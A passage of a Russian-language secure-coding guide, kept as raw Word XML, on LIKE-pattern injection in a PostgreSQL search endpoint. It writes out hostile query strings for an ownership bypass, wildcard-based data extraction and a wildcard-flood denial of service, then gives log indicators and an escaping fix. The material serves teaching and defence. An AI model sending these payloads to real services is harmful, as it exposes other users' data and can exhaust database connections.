        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает NULL для NULL, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отбрасывается; но любую non-NULL строку матчит). Document 42 возвращается независимо от его owner — full ownership bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF3FD83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — Information leak через position-by-position wildcards `_`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5157B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /documents/search?q=a%25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9DF79F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pattern = "%a%%"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → матчит всё с буквой 'a'. Атакующий итерирует: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (count rows), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=ab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=abc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — extraction скрытых данных через row count в response. Более точная техника:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50314BD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /documents/search?q=admin@__@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E36DF48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pattern = "%admin@__@example.com%"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — матчит «admin@XX@example.com» с любыми двумя символами вместо XX. Position-by-position extraction email-формата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2089C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — ReDoS-style DoS через множественные `%` (без index-support):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5248BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /documents/search?q=%25a%25b%25c%25d%25e%25f%25g%25h%25i%25j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD9CBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pattern = "%%a%b%c%d%e%f%g%h%i%j%"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (после URL-decode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). На таблице documents без trigram-индекса PostgreSQL делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sequential scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + LIKE match для каждой row. Match-engine для pattern с множественными </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уходит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exponential backtracking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на строках, содержащих partial matches (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>abcdefghijkl...</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D328793" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Эксперимент на ~100k rows с длинными title (&gt;200 chars): time увеличивается от ~50ms (normal) до 30+ seconds для такого pattern. Множественные одновременные запросы — full DoS database connection pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168803D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — bypass ownership/access check, полное чтение чужих данных. Variant B — information leak о формате значений через position-matching. Variant C — DoS database через backtracking matcher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B084F9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E2DADC"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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... LIKE '%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... LIKE '%...%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с длительностью &gt;&gt; normal — типичный pattern injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2CC9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_duration_statement = 1000</w:t>
      </w:r>
      <w:r>
        <w:t>: medium-DoS Variant C виден через slow queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA080B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   HTTP access-log: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) или подряд идущие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>__</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A760874"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LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL — стандартный SQL92-оператор pattern matching. По дизайну:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2F282C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zero or more characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15251E9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exactly one character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1445FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3. Любой другой символ — matches literally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CD5299" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (backslash) — escape character </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>по умолчанию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только если LIKE с `ESCAPE` clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE69C10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Pattern Matching</w:t>
      </w:r>
      <w:r>
        <w:t>): *"LIKE pattern matching always covers the entire string. ... If pattern does not contain percent signs or underscores, then the pattern only represents the string itself; in that case LIKE acts like the equals operator."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFDDB8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bind-параметр передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>значение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в LIKE — это значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>является pattern</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Bind не делает escape pattern-символов, потому что bind работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL-уровне</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (защищает от quote injection), а LIKE-pattern — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>семантика выше SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это эквивалентно тому, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval(user_input)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Python — bind защищает от Python-syntax injection, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всё равно исполняет код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC3325" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>escape pattern-символов в значении</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A2EF93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def escape_like_pattern(s: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDD224" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Escape %, _, и сам backslash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13036C99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569E1EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D31B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@router.get("/documents/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739138B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_documents(q: str = Query(""), ...):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFA212" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    safe_q = escape_like_pattern(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E98000" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE07CAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title FROM documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C02A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE title ILIKE :pattern ESCAPE '\\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E28D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0991A317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A5AE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"pattern": f"%{safe_q}%"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED6C69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164EFF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESCAPE '\\'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> clause устанавливает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как escape character; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> теперь литералы. Альтернативы для FTS-эндпоинта — переход на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.15.3) или PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extension с </w:t>
      </w:r>
      <w:r>
